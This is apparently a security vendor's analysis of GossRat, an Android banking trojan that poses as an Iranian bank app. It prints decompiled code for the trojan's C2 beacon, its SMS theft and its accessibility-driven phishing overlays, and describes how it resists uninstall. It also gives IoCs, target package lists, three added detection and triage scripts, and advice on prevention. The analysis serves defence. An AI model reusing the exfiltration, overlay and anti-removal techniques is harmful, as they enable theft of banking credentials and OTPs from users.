Overview
Type: Trojan
Destruction Level: Medium
Prevalence: Medium
Malware name(s)
- Trojan.Android.Banker.IR (Padvish)
- HEUR:Trojan-Banker.AndroidOS.GossRat.a (Kaspersky)
- A Variant Of Android/Spy.Banker.BZY (ESET)
What is a Trojan?
A Trojan is malware that disguises itself as clean, legitimate software and behaves like a useful, functional program, but once executed it damages the system.
Trojans reach a system in several ways: bundled with software downloaded from the Internet, embedded in HTML content, attached to an e-mail, and so on.
What is the Banker malware family?
This malware family masquerades as banking, financial and other legitimate applications and is built specifically to steal banking, financial and other sensitive information from Android devices. It can intercept data such as credit card details, online banking credentials, OTP codes and transaction details.
Technical Review
Indicators of Compromise (IoC)
The malware is installed on the victim's phone and masquerades as Hamrah Bank Saderat (a banking application).
After launch, it asks the user to grant it access to read SMS messages (so it can capture banking SMS) and to enable its Accessibility Service.
The Accessibility Service is the key permission: the malware insists that the user grant it, and once granted it can read and act on the screens of other applications, which gives it the following capabilities for abuse:
- Stealing online banking login information
- Stealing credit card information
- Access to user SMS to steal OTP codes
This Trojan belongs to a new banking campaign targeting customers of several Iranian banks, including Bank Melli, Saderat, Pasargad and Sepah. Besides banking applications, it also targets a number of cryptocurrency wallet applications.
Indicators of compromise
- Request to enable the Accessibility Service
- Changing system settings without the user's permission
✅ Main activity com.sadsad.newsdfg.appui.SplashActivity
In this activity, the malware uses the following method to send device information to its C2 server at
https[:]//rat-saderat[.]click/rat/gossiper.php
The data sent includes the Android ID (device identifier), the device manufacturer, model and Android OS version, the installed version of the malware (hard-coded as "8"), and the list of installed applications that appear in the malware's target list (banking applications and cryptocurrency wallets, per the table below).
```java
public void gossiper(Response.Listener<Message> success, Response.ErrorListener errorListener) {
    Type type = new TypeToken<Message>() { // from class: com.sadsad.newsdfg.api.ApiSender.3
    }.getType();
    HashMap hashMap = new HashMap();
    // Device fingerprint: Android ID plus manufacturer, model and OS release.
    hashMap.put("android_id", Util.getAndroidID(this.context));
    hashMap.put("device", Build.MANUFACTURER + " | " + Build.MODEL + " | " + Build.VERSION.RELEASE);
    // Hard-coded malware version.
    hashMap.put("version", "8");
    try {
        // Installed applications that match the target list, serialized as JSON.
        hashMap.put("extra_data", new Gson().toJson(Util.getAllApps(this.context)));
    } catch (Exception unused) {
    }
    // Request method 1 (POST) to LINK.GOSSIPER, i.e. /rat/gossiper.php on the C2 server.
    ApiRequest.instance(this.context).add(new GsonService(1, LINK.GOSSIPER(this.context), hashMap, success, errorListener, type));
}
```
The package names of the applications checked by the malware are listed in the following table:

| Application name | Package name |
|---|---|
| Bam | ir.bmi.bam.nativeweb |
| Hamrah Bank Mellat | com.pmb.mobile |
| Sepah MBanking | mob.banking.android.sepah |
| Hamrah Bank | com.isc.bsinew |
| blu | com.samanpr.blu |
| Pasargad MBanking | mob.banking.android.pasargad |
| Hamrah Shahr Plus | com.citydi.hplus |
| Hamrah Bank Tejarat | ir.tejaratbank.tata.mobile.android.tejarat |
| MetaMask | io.metamask |
| Digipay | com.mydigipay.app.android |
| Parsian Man | com.parsmobapp |
| Fantom fWallet | network.fantom.fwallet |
| Resalat MBanking | mob.banking.android.resalat |
| Up | com.sibche.aspardproject.app |
| SafePal | io.safepal.wallet |
| Nobitex | market.nobitex |
| Hamrah Novin | com.farazpardazan.enbank |
| Trust Wallet | com.wallet.crypto.trustapp |
| CoinEx | com.coinex.trade.play |
| Chrome | com.android.chrome |
| KuCoin | com.kubi.kucoin |
| Refah Bank Mobile | com.refahbank.dpi.android |
| Bitpin | io.bitpin.app |
| Hamrah card | com.adpdigital.mbs.ayande |
| Coinbase | com.coinbase.android |
| TronLink Pro | com.tronlinkpro.wallet |
| Tetherland | land.tether.tetherland |
| MathWallet | com.mathwallet.android |
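When this beacon shows up in a proxy capture, the first thing an analyst wants is to decode it and see which of the targeted apps the victim actually has. The following decoder is an added example, not code from the page or the malware. It assumes two things the page does not state: that the HashMap is sent as an application/x-www-form-urlencoded POST body (the usual encoding for a Volley request's parameters), and that extra_data is a JSON array of package names. The sample body is constructed.

```python
"""Decode a captured GossRat gossiper.php beacon (added example, not the
malware's or the page's code).

Assumptions not stated on the page: the request body is
application/x-www-form-urlencoded, and extra_data is a JSON array of
package-name strings.  SAMPLE_BODY is constructed for the demonstration.
"""
import json
from urllib.parse import parse_qs

# Package name -> product name, taken from the target table above.
TARGETS = {
    "ir.bmi.bam.nativeweb": "Bam",
    "com.pmb.mobile": "Hamrah Bank Mellat",
    "mob.banking.android.sepah": "Sepah MBanking",
    "com.isc.bsinew": "Hamrah Bank",
    "com.samanpr.blu": "blu",
    "mob.banking.android.pasargad": "Pasargad MBanking",
    "com.citydi.hplus": "Hamrah Shahr Plus",
    "ir.tejaratbank.tata.mobile.android.tejarat": "Hamrah Bank Tejarat",
    "io.metamask": "MetaMask",
    "com.mydigipay.app.android": "Digipay",
    "com.parsmobapp": "Parsian Man",
    "network.fantom.fwallet": "Fantom fWallet",
    "mob.banking.android.resalat": "Resalat MBanking",
    "com.sibche.aspardproject.app": "Up",
    "io.safepal.wallet": "SafePal",
    "market.nobitex": "Nobitex",
    "com.farazpardazan.enbank": "Hamrah Novin",
    "com.wallet.crypto.trustapp": "Trust Wallet",
    "com.coinex.trade.play": "CoinEx",
    "com.android.chrome": "Chrome",
    "com.kubi.kucoin": "KuCoin",
    "com.refahbank.dpi.android": "Refah Bank Mobile",
    "io.bitpin.app": "Bitpin",
    "com.adpdigital.mbs.ayande": "Hamrah card",
    "com.coinbase.android": "Coinbase",
    "com.tronlinkpro.wallet": "TronLink Pro",
    "land.tether.tetherland": "Tetherland",
    "com.mathwallet.android": "MathWallet",
}

# Constructed sample of a beacon body as a proxy would record it.
SAMPLE_BODY = (
    "android_id=9774d56d682e549c"
    "&device=samsung+%7C+SM-A515F+%7C+12"
    "&version=8"
    "&extra_data=%5B%22com.pmb.mobile%22%2C%22io.metamask%22%2C%22com.example.notes%22%5D"
)


def decode_beacon(body: str) -> dict:
    """Split the form body into its fields and map extra_data onto the target list."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    # "device" is built as MANUFACTURER | MODEL | VERSION.RELEASE (see gossiper()).
    manufacturer, model, release = [p.strip() for p in fields.get("device", "||").split("|", 2)]
    try:
        apps = json.loads(fields.get("extra_data", "[]"))
    except json.JSONDecodeError:
        apps = []
    # Tolerate a malformed or differently shaped extra_data: keep only string entries.
    apps = [a for a in apps if isinstance(a, str)] if isinstance(apps, list) else []
    targeted = {a: TARGETS[a] for a in apps if a in TARGETS}
    return {
        "android_id": fields.get("android_id", ""),
        "manufacturer": manufacturer,
        "model": model,
        "android_release": release,
        "malware_version": fields.get("version", ""),
        "reported_apps": apps,
        "targeted_apps": targeted,
    }


if __name__ == "__main__":
    for k, v in decode_beacon(SAMPLE_BODY).items():
        print(f"{k}: {v}")
```

The targeted_apps entry tells the analyst which overlay activities (F_Mellat, and so on) the victim was exposed to, and the android_id ties the beacon to the later sendData.php and sendLoginData.php requests from the same device.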
✅ com.sadsad.newsdfg.MyAccessibilityService service
In this service the malware performs several tasks: handling accessibility events, monitoring incoming SMS, tracking the targeted banking applications and overlaying them with its own screens, and driving vendor-specific settings screens on Samsung and Xiaomi devices.
The onAccessibilityEvent method is called whenever an accessibility event is delivered. It reads the package name of the application that produced the event and compares it with the list of targeted banking applications (BAM, MELLAT, SEPAH, SADERAT, BLUEBANK, PASARGAD, SHAHR, TEJARAT); on a match it launches the phishing activity for that bank so that it is displayed to the user on top of the real application.
For example, the package name of the Bank Mellat application is com.pmb.mobile. If that package is in the target list, the malware has not yet marked it as "opened" in its own storage, and more than 10 minutes (600 seconds) have passed since the last submission for that bank, the malware launches its Bank Mellat activity (com.sadsad.newsdfg.activity.F_Mellat) in a new task.
Next, on Samsung and Xiaomi devices, if the malware has not been granted SMS permission, the functionGrantSMSPermission method uses the accessibility service to click through the system dialog and grant it automatically.
Likewise, if it lacks the Draw Over Other Apps permission (which lets an application display its content on top of other applications, above whatever is running behind it), the functionFindItemDrawOverLay method navigates the settings screen and enables it through the accessibility service. Finally, the functionAvoidUninstallApp method prevents the user from removing the malware from the phone.
```java
public void onAccessibilityEvent(AccessibilityEvent accessibilityEvent) {
    AccessibilityNodeInfo source = accessibilityEvent.getSource();
    if (source == null || source.getPackageName() == null) {
        return;
    }
    Log.i("rat_", "p_>: " + ((Object) source.getPackageName()));
    // Is the foreground package one of the targeted banking apps?
    if (Arrays.asList(Util.Apps.APPS).contains(((Object) source.getPackageName()) + "")) {
        String str = ((Object) source.getPackageName()) + "";
        str.hashCode();
        char c = 65535;
        // javac's string switch: hash first, then equals().
        switch (str.hashCode()) {
            case -2100591472:
                if (str.equals(Util.Apps.SEPAH)) {
                    c = 0;
                    break;
                }
                break;
            case -1922768888:
                if (str.equals(Util.Apps.BAM)) {
                    c = 1;
                    break;
                }
                break;
            case -1535722223:
                if (str.equals(Util.Apps.SHAHR)) {
                    c = 2;
                    break;
                }
                break;
            case -1149263316:
                if (str.equals(Util.Apps.PASARGAD)) {
                    c = 3;
                    break;
                }
                break;
            case -764315848:
                if (str.equals(Util.Apps.MELLAT)) {
                    c = 4;
                    break;
                }
                break;
            case -211716598:
                if (str.equals(Util.Apps.SADERAT)) {
                    c = 5;
                    break;
                }
                break;
            case -99771380:
                if (str.equals(Util.Apps.TEJARAT)) {
                    c = 6;
                    break;
                }
                break;
            case 254313950:
                if (str.equals(Util.Apps.BLUEBANK)) {
                    c = 7;
                    break;
                }
                break;
        }
        // For each bank: show the overlay once per 600-second window.
        // 268435456 == Intent.FLAG_ACTIVITY_NEW_TASK.
        switch (c) {
            case 0:
                if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.SEPAH) && (System.currentTimeMillis() - ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.SEPAH)) / 1000 >= 600) {
                    ShareStorage.getInstance(this).setAppOpened(Util.Apps.SEPAH, true);
                    Intent intent = new Intent(this, F_SepahBank.class);
                    intent.setFlags(268435456);
                    startActivity(intent);
                    break;
                }
                break;
            case 1:
                if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.BAM) && (System.currentTimeMillis() - ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.BAM)) / 1000 >= 600) {
                    ShareStorage.getInstance(this).setAppOpened(Util.Apps.BAM, true);
                    Intent intent2 = new Intent(this, F_Bam.class);
                    intent2.setFlags(268435456);
                    startActivity(intent2);
                    break;
                }
                break;
            case 2:
                if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.SHAHR) && (System.currentTimeMillis() - ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.SHAHR)) / 1000 >= 600) {
                    ShareStorage.getInstance(this).setAppOpened(Util.Apps.SHAHR, true);
                    Intent intent3 = new Intent(this, F_ShahrBank.class);
                    intent3.setFlags(268435456);
                    startActivity(intent3);
                    break;
                }
                break;
            case 3:
                if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.PASARGAD) && (System.currentTimeMillis() - ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.PASARGAD)) / 1000 >= 600) {
                    ShareStorage.getInstance(this).setAppOpened(Util.Apps.PASARGAD, true);
                    Intent intent4 = new Intent(this, F_Pasargad.class);
                    intent4.setFlags(268435456);
                    startActivity(intent4);
                    break;
                }
                break;
            case 4:
                if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.MELLAT) && (System.currentTimeMillis() - ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.MELLAT)) / 1000 >= 600) {
                    ShareStorage.getInstance(this).setAppOpened(Util.Apps.MELLAT, true);
                    Intent intent5 = new Intent(this, F_Mellat.class);
                    intent5.setFlags(268435456);
                    startActivity(intent5);
                    break;
                }
                break;
            case 5:
                if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.SADERAT) && (System.currentTimeMillis() - ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.SADERAT)) / 1000 >= 600) {
                    ShareStorage.getInstance(this).setAppOpened(Util.Apps.SADERAT, true);
                    Intent intent6 = new Intent(this, F_Saderat.class);
                    intent6.setFlags(268435456);
                    startActivity(intent6);
                    break;
                }
                break;
            case 6:
                if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.TEJARAT) && (System.currentTimeMillis() - ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.TEJARAT)) / 1000 >= 600) {
                    ShareStorage.getInstance(this).setAppOpened(Util.Apps.TEJARAT, true);
                    Intent intent7 = new Intent(this, F_Tejarat.class);
                    intent7.setFlags(268435456);
                    startActivity(intent7);
                    break;
                }
                break;
            case 7:
                if (!ShareStorage.getInstance(this).isAppOpened(Util.Apps.BLUEBANK) && (System.currentTimeMillis() - ShareStorage.getInstance(this).lastSubmitTimeApp(Util.Apps.BLUEBANK)) / 1000 >= 600) {
                    ShareStorage.getInstance(this).setAppOpened(Util.Apps.BLUEBANK, true);
                    Intent intent8 = new Intent(this, F_BlueBank.class);
                    intent8.setFlags(268435456);
                    startActivity(intent8);
                    break;
                }
                break;
        }
    }
    // Vendor-specific automation of the Settings UI. Event type 2048 is
    // AccessibilityEvent.TYPE_WINDOW_CONTENT_CHANGED.
    if (Build.MANUFACTURER.equalsIgnoreCase("samsung")) {
        if (ShareStorage.STATE.STATE_ACCEPT_SMS_PERMISSION.equals(ShareStorage.getInstance(this).getState())) {
            SamsungHandler.functionGrantSMSPermission(source, this, this.allowPermission);
        } else if (ShareStorage.STATE.STATE_TRACK_DRAW_OVER_LAY.equals(ShareStorage.getInstance(this).getState())) {
            SamsungHandler.functionFindItemDrawOverLay(this, source, this.appearOnTop, this.allowPermissionTop);
        }
        if (accessibilityEvent.getEventType() == 2048 && ShareStorage.getInstance(this).isAvoidUninstallApp()) {
            SamsungHandler.functionAvoidUninstallApp(this, source, this.appName, this.appInfo, this.unInstall);
        }
    } else if (Build.MANUFACTURER.equalsIgnoreCase("xiaomi")) {
        if (ShareStorage.STATE.STATE_ACCEPT_SMS_PERMISSION.equals(ShareStorage.getInstance(this).getState())) {
            XiaomiHandler.functionGrantSMSPermission(source, this, this.allowXiaomiSMS, this.allowXiaomiSMS2, this.allowXiaomiSMS3);
        } else if (ShareStorage.STATE.STATE_TRACK_DRAW_OVER_LAY.equals(ShareStorage.getInstance(this).getState())) {
            XiaomiHandler.functionFindItemDrawOverLay(this, source, this.advanced, this.displayOverOtherApps, this.allowDisplayOverOtherApps);
        }
        if (accessibilityEvent.getEventType() == 2048 && ShareStorage.getInstance(this).isAvoidUninstallApp()) {
            XiaomiHandler.functionAvoidUninstallApp(this, source, this.appName, this.appInfo, this.unInstall, this.uninstall_xiaomi_1, this.uninstall_xiaomi_2, this.accessibilityMenu, this.downloadedApps, this.downloadedServices);
        }
    }
}
```
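The three permissions this service relies on (an enabled accessibility service, "draw over other apps", and the SMS runtime permissions) are all visible from adb, so a triage of a suspect device does not need the sample in hand. The script below is an added example, not part of the page or the malware. It parses the text printed by `adb shell settings get secure enabled_accessibility_services`, `adb shell appops get <pkg> SYSTEM_ALERT_WINDOW` and `adb shell dumpsys package <pkg>`; the sample outputs embedded here are constructed and only approximate the real format, and the BENIGN_A11Y_PACKAGES allow-list is an assumption that an analyst would extend for the device at hand.

```python
"""Triage an Android device for the permission profile GossRat abuses
(added example; not the page's or the malware's code).

Checks: third-party accessibility services that are enabled, whether the
suspect package may draw over other apps, and which SMS runtime
permissions it holds.  Inputs are the text printed by:
  adb shell settings get secure enabled_accessibility_services
  adb shell appops get <pkg> SYSTEM_ALERT_WINDOW
  adb shell dumpsys package <pkg>
The SAMPLE_* strings are constructed approximations of those outputs.
"""
from __future__ import annotations

import re

# Constructed: entries are "package/service", separated by colons.  On a real
# device the service may also appear abbreviated, e.g. "pkg/.MyAccessibilityService".
SAMPLE_A11Y = (
    "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService:"
    "com.sadsad.newsdfg/com.sadsad.newsdfg.MyAccessibilityService"
)
# Constructed: `appops get com.sadsad.newsdfg SYSTEM_ALERT_WINDOW`
SAMPLE_APPOPS = "SYSTEM_ALERT_WINDOW: allow; time=+2d3h12m0s ago"
# Constructed excerpt of `dumpsys package com.sadsad.newsdfg`
SAMPLE_DUMPSYS = """\
    runtime permissions:
      android.permission.RECEIVE_SMS: granted=true, flags=[ USER_SET|USER_SENSITIVE_WHEN_GRANTED]
      android.permission.READ_SMS: granted=true, flags=[ USER_SET]
      android.permission.CAMERA: granted=false, flags=[ USER_SET]
"""

# Assumption: services from these packages are expected on the device (screen reader etc.).
BENIGN_A11Y_PACKAGES = {"com.google.android.marvin.talkback"}
SMS_PERMISSIONS = {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"}


def enabled_accessibility_services(raw: str) -> list[tuple[str, str]]:
    """Split the colon-separated setting into (package, service) pairs."""
    pairs = []
    for entry in raw.strip().split(":"):
        if "/" in entry:
            pkg, svc = entry.split("/", 1)
            pairs.append((pkg, svc))
    return pairs


def overlay_allowed(appops_output: str) -> bool:
    """True when the SYSTEM_ALERT_WINDOW appop mode is 'allow'."""
    m = re.search(r"SYSTEM_ALERT_WINDOW:\s*(\w+)", appops_output)
    return bool(m) and m.group(1) == "allow"


def granted_permissions(dumpsys_output: str) -> set[str]:
    """Runtime permissions reported with granted=true."""
    return set(re.findall(r"(android\.permission\.\w+): granted=true", dumpsys_output))


def triage(a11y_raw: str, appops_output: str, dumpsys_output: str) -> list[str]:
    """Return one finding per abused capability that is present."""
    findings = []
    for pkg, svc in enabled_accessibility_services(a11y_raw):
        if pkg not in BENIGN_A11Y_PACKAGES:
            findings.append(f"third-party accessibility service enabled: {pkg}/{svc}")
    if overlay_allowed(appops_output):
        findings.append("SYSTEM_ALERT_WINDOW allowed (needed for the phishing overlays)")
    sms = granted_permissions(dumpsys_output) & SMS_PERMISSIONS
    if sms:
        findings.append("SMS permissions granted: " + ", ".join(sorted(sms)))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_A11Y, SAMPLE_APPOPS, SAMPLE_DUMPSYS):
        print("!", finding)
```

A package that scores on all three findings has exactly the capability set this service needs; an accessibility service from an app that is not a screen reader or similar assistive tool is by itself worth investigating.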
The SMSBroadCast class is registered as a dynamic broadcast receiver inside the malware's service. Whenever an SMS arrives, its onReceive method runs: it reassembles the message body from the received PDUs, and the body, the sender's address and the device's Android ID are sent to the C2 endpoint https[:]//rat-saderat[.]click/rat/sendData.php by the sendDataToServer method.
```java
public void onReceive(Context context, Intent intent) {
    Bundle extras = intent.getExtras();
    if (extras != null) {
        String str = "";
        String str2 = "";
        // A long SMS arrives as several PDUs; concatenate their bodies.
        for (Object obj : (Object[]) extras.get("pdus")) {
            SmsMessage createFromPdu = SmsMessage.createFromPdu((byte[]) obj);
            String str3 = createFromPdu.getMessageBody().toString();
            str = createFromPdu.getOriginatingAddress();
            str2 = str2 + str3;
        }
        // Sender address and full body go to /rat/sendData.php.
        sendDataToServer(context, str, str2, 0);
    }
}
```
✅ com.sadsad.newsdfg.activity.F_Mellat activity
This activity imitates the login page of the Bank Mellat application. When the real Bank Mellat application is installed and comes to the foreground (under the conditions described above), the malware shows this activity over it, captures the user's banking credentials and sends them to the C2 server.
In the submitLogin method, the values the user enters (mobile number, username and password for the Bank Mellat application) are sent, together with the device's Android ID, to https[:]//rat-saderat[.]click/rat/sendLoginData.php.
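With all three C2 endpoints known (gossiper.php, sendData.php, sendLoginData.php), a proxy or gateway log can be searched for them and each hit labelled with what was leaking at that moment. The scanner below is an added example, not code from the page. The log format is a constructed, generic one ("<epoch> <client> <method> <url> <status>") standing in for whatever the local proxy writes; the sample lines are constructed, and the host match is exact and case-insensitive so that look-alike domains are not counted.

```python
"""Find GossRat C2 traffic in proxy log lines (added example; not from the page).

The endpoints come from the analysis above.  The log format is a
constructed, generic one: "<epoch> <client> <method> <url> <status>".
"""
from __future__ import annotations

from urllib.parse import urlsplit

C2_HOST = "rat-saderat.click"
C2_PATHS = {
    "/rat/gossiper.php": "beacon with device info and installed-app inventory",
    "/rat/sendData.php": "SMS exfiltration (body, sender, Android ID)",
    "/rat/sendLoginData.php": "banking credential exfiltration",
}

# Constructed sample log.  Line 5 is a look-alike host and must not match.
SAMPLE_LOG = """\
1712000001 10.0.0.12 POST https://rat-Saderat.click/rat/gossiper.php 200
1712000002 10.0.0.12 GET https://www.example.com/index.html 200
1712000040 10.0.0.12 POST https://rat-saderat.click/rat/sendData.php 200
1712000055 10.0.0.17 POST https://rat-saderat.click/rat/sendLoginData.php 200
1712000060 10.0.0.17 POST https://notrat-saderat.click/rat/sendData.php 200
1712000070 10.0.0.19 GET https://rat-saderat.click/favicon.ico 404
"""


def classify(url: str) -> str | None:
    """Label a URL if it points at the C2 host; None otherwise."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host != C2_HOST:
        return None
    return C2_PATHS.get(parts.path, "other request to C2 host")


def scan(log_text: str) -> list[dict]:
    """Return one record per C2 hit, in log order."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        label = classify(fields[3])
        if label:
            hits.append({"ts": int(fields[0]), "client": fields[1], "url": fields[3], "what": label})
    return hits


def victims(hits: list[dict]) -> list[str]:
    """Distinct client addresses that contacted the C2 host."""
    return sorted({h["client"] for h in hits})


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["client"], h["what"])
    print("victims:", victims(hits))
```

A sendLoginData.php hit means credentials for the bank whose overlay was shown have already left the device, so the affected account should be treated as compromised rather than merely at risk.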
Malware Techniques
On Samsung phones the malware uses the functionAvoidUninstallApp method to prevent its removal and so keep itself on the device. Whenever the accessibility service reports that the content of the foreground window has changed, the malware checks whether the package name of the running application is one of the following; if it is, it leaves that screen by simulating the Back button, so the user cannot uninstall the malware or stop its service:
- com.samsung.accessibility (Samsung's system accessibility settings application)
- com.sec.android.app.launcher (the default launcher on Samsung devices)
- com.google.android.packageinstaller (the system application that installs and removes other applications)
- com.android.settings (the Android system Settings application)
On Xiaomi devices the malware blocks its removal in the same way, driving the corresponding Xiaomi settings screens.
How to deal with and clean the system?
To make sure the device is not infected, install Padvish antivirus, keep its database up to date and run regular scans.
How to prevent the phone's infection?
- When installing an application on a mobile device, pay attention to the permissions it requests. If an application asks for permissions unrelated to its function, especially the Accessibility Service, treat it with suspicion.
- Keep your mobile device up to date; ideally enable automatic updates.
- Download applications, especially banking applications, only from the bank's official website or trusted application stores; do not install applications from Telegram channels, Instagram or untrustworthy websites.
- Do not tap suspicious links received by SMS.